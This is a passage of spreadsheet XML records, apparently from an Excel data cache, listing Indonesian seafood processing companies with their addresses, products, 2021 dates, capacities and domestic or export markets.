    <s v="Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Bandeng, Patin, Bawal, Nila)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="178860"/>
    <s v="Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Purwakarta"/>
    <m/>
  </r>
  <r>
    <n v="24294"/>
    <x v="1008"/>
    <s v="HAFISHFOOD"/>
    <s v="Jl. Arif Rahman Hakim RT 16, Kel. Simpang IV Sipin, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Pempek Ikan"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Medan, Kota Padang, Kota Bukittinggi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Kendal, Kota Surakarta, Kota Tegal, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="24295"/>
    <x v="1009"/>
    <s v="UD. MINA NUSANTARA"/>
    <s v="Jl. Mawar Indah No.10, Kel. Labuhan Dalam, Kec. Tanjung Senang, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Lele Asap"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="600"/>
    <s v="Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="24296"/>
    <x v="1009"/>
    <s v="UD. MINA NUSANTARA"/>
    <s v="Jl. Mawar Indah No.10, Kel. Labuhan Dalam, Kec. Tanjung Senang, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Abon Ikan"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="900"/>
    <s v="Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="24297"/>
    <x v="1009"/>
    <s v="UD. MINA NUSANTARA"/>
    <s v="Jl. Mawar Indah No.10, Kel. Labuhan Dalam, Kec. Tanjung Senang, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Crispy Ikan"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="720"/>
    <s v="Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="24300"/>
    <x v="1010"/>
    <s v="PT. SOUTH SUCO"/>
    <s v="Jl. Kima VI Blok G-4, Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="925000"/>
    <m/>
    <s v="Japan, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24301"/>
    <x v="1011"/>
    <s v="PT. KELOLA LAUT NUSANTARA"/>
    <s v="Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Anggoli, Kerapu, Sukang, Kakatua, Pinjalo, Kakap, Kuro, Lidah, Kurisi, Barramundi)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="24302"/>
    <x v="1011"/>
    <s v="PT. KELOLA LAUT NUSANTARA"/>
    <s v="Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Cobia, Bonito, Barakuda, Marlin, Kembung, Lemadang, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="30000"/>
    <s v="Kabupaten Halmahera Selatan"/>
    <s v="Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="24303"/>
    <x v="1011"/>
    <s v="PT. KELOLA LAUT NUSANTARA"/>
    <s v="Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Hiu Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24304"/>
    <x v="1011"/>
    <s v="PT. KELOLA LAUT NUSANTARA"/>
    <s v="Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="8000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24305"/>
    <x v="1011"/>
    <s v="PT. KELOLA LAUT NUSANTARA"/>
    <s v="Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Otoshimi Beku"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pati"/>
    <m/>
  </r>
  <r>
    <n v="24306"/>
    <x v="938"/>
    <s v="PT. LAUT PANEN RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Amberjack, Striped Jack, Ekor Kuning)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24307"/>
    <x v="1012"/>
    <s v="PT. MERDEKA BAHARI INDONESIA"/>
    <s v="Jl. Tegal Pemalang Km 11, Kel. Sidaharja, Kec. Suradadi, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Mata Besar, Mata Goyang)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000000"/>
    <s v="Kabupaten Pekalongan, Kabupaten Tegal, Kabupaten Brebes, Kota Pekalongan, Kota Tegal, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24308"/>
    <x v="1013"/>
    <s v="CV. DIAN SAMUDRA"/>
    <s v="Pelabuhan Perikanan Nusantara Ambon, Jl. Sultan Hasanudin, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Baby Tuna, Deho, Layang, Baronang, Kurisi)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Pontianak"/>
    <m/>
  </r>
  <r>
    <n v="24309"/>
    <x v="1013"/>
    <s v="CV. DIAN SAMUDRA"/>
    <s v="Pelabuhan Perikanan Nusantara Ambon, Jl. Sultan Hasanudin, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Kembung, Layang, Cakalang)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="16000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Pontianak"/>
    <m/>
  </r>
  <r>
    <n v="24310"/>
    <x v="1013"/>
    <s v="CV. DIAN SAMUDRA"/>
    <s v="Pelabuhan Perikanan Nusantara Ambon, Jl. Sultan Hasanudin, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Pontianak"/>
    <m/>
  </r>
  <r>
    <n v="24311"/>
    <x v="1014"/>
    <s v="PT, INDOKULINA SARANA UTAMA"/>
    <s v="Jl, Milenium II Blok F4 No,3 Room 4, Kel, Peusar, Kec, Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24312"/>
    <x v="1014"/>
    <s v="PT, INDOKULINA SARANA UTAMA"/>
    <s v="Jl, Milenium II Blok F4 No,3 Room 4, Kel, Peusar, Kec, Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24313"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kel. Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24314"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100, Jl. Irian Blok FF No.2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24315"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100, Jl. Irian Blok FF No.2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24316"/>
    <x v="668"/>
    <s v="PT. SUKANDA DJAYA"/>
    <s v="Kawasan Industri MM2100, Jl. Irian Blok FF No.2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Scallop Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24317"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kel. Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang)"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1239810"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24318"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kel. Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku (Steak, Saku, Cube)"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24319"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kel. Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Udang Beku"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24322"/>
    <x v="480"/>
    <s v="PT. PAPUA FISHINDO JAYA"/>
    <s v="Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Makassar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="24323"/>
    <x v="480"/>
    <s v="PT. PAPUA FISHINDO JAYA"/>
    <s v="Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Tenggiri)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24324"/>
    <x v="1015"/>
    <s v="PT. ESCO CHEMICALS MITRA UTAMA"/>
    <s v="Jl. Pemda Tigaraksa, Gudang Bizpoin Blok E No.38, Kel. Sukamulya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Refined Carrageenan"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="40000"/>
    <s v="Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24325"/>
    <x v="1015"/>
    <s v="PT. ESCO CHEMICALS MITRA UTAMA"/>
    <s v="Jl. Pemda Tigaraksa, Gudang Bizpoin Blok E No.38, Kel. Sukamulya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Nori"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="24326"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, Canada, Hong Kong, New Zealand, Saudi Arabia, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="24327"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, New Zealand, United States"/>
  </r>
  <r>
    <n v="24328"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Sambal Terasi Udang"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Australia, New Zealand, United States"/>
  </r>
  <r>
    <n v="24329"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Terasi Udang"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Australia, New Zealand, Saudi Arabia"/>
  </r>
  <r>
    <n v="24330"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Campuran Seafood Snack"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia, Korea, Democratic People's Republic of, New Zealand, United States"/>
  </r>
  <r>
    <n v="24331"/>
    <x v="1016"/>
    <s v="CV. SENTOSA TRADING"/>
    <s v="Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Dried Cephalopod (Cumi-cumi)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24332"/>
    <x v="1017"/>
    <s v="UD. HIGHLANDER CONVERTION"/>
    <s v="Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Demak, Kabupaten Pasuruan"/>
    <m/>
  </r>
  <r>
    <n v="24333"/>
    <x v="1017"/>
    <s v="UD. HIGHLANDER CONVERTION"/>
    <s v="Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Cephalopoda Segar (Gurita)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kabupaten Banyuwangi, Kabupaten Situbondo, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24334"/>
    <x v="1017"/>
    <s v="UD. HIGHLANDER CONVERTION"/>
    <s v="Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Situbondo, Kabupaten Gresik"/>
    <m/>
  </r>
  <r>
    <n v="24335"/>
    <x v="1017"/>
    <s v="UD. HIGHLANDER CONVERTION"/>
    <s v="Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakatua, Kakap)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Situbondo, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24337"/>
    <x v="1018"/>
    <s v="PT. BALI MINA UTAMA"/>
    <s v="Jl. Ikan Tuna Raya Timur No.3, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpsar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="307197"/>
    <m/>
    <s v="Australia, Hong Kong, Japan, Jordan, Lebanon, Malaysia, Russian Federation, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="24338"/>
    <x v="1018"/>
    <s v="PT. BALI MINA UTAMA"/>
    <s v="Jl. Ikan Tuna Raya Timur No.3, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpsar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Meka, Gindara, Tenggiri)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="1650"/>
    <m/>
    <s v="Hong Kong, Jordan, Lebanon, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24339"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Gindara, Layaran, Salem, Meka)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Spain"/>
  </r>
  <r>
    <n v="24340"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24341"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24342"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24343"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24344"/>
    <x v="1019"/>
    <s v="PT. TUNA PERMATA REZEKI"/>
    <s v="Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Kerapu, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="24345"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24347"/>
    <x v="1020"/>
    <s v="PT. SEKAR KATOKICHI"/>
    <s v="Jl. Jenggolo 2/17 Gedung A, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24348"/>
    <x v="1020"/>
    <s v="PT. SEKAR KATOKICHI"/>
    <s v="Jl. Jenggolo 2/17 Gedung A, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1260000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="24349"/>
    <x v="1020"/>
    <s v="PT. SEKAR KATOKICHI"/>
    <s v="Jl. Jenggolo 2/17 Gedung A, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Beku (Naget Ikan, Naget Udang, Kue Ikan)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="24350"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24351"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24352"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Remang, Layur, Sukang, Bawal, Kakap, Samge, Kurisi)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24353"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Teri, Tenggiri)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24354"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24355"/>
    <x v="1021"/>
    <s v="PT. JAYA SAKTI CIREBON"/>
    <s v="Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Rajungan Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia"/>
  </r>
  <r>
    <n v="24358"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Purwakarta, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24360"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Lemadang, Gindara, Salem, Selar)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Purwakarta, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24362"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
